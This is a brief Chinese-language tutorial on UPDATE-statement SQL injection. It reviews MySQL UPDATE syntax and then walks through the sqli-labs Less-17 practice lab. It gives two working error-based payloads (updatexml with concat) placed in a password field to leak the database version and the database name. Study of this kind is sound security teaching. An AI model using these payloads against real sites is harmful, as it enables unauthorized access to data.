一:Update注入原理
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了update
类型sql语句的用户输入的内容的过滤
二、mysql的Update语句复习
update语句可用来修改表中的数据,简单来说基本的使用形式为:
update表名称set列名称=新值where更新条件;
UPDATE table_name SET field1=new-value1,field2=new-value2[WHERE Clause]
1、sqli-labs less-17关
payload
name=admin&passwd=admin' or updatexml(1,concat(0x7e,version(),0x7e),1)#&submit=Submit
如下图所示,爆出版本信息
uname=admin&passwd=000000' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
如下图所示,爆出数据库名称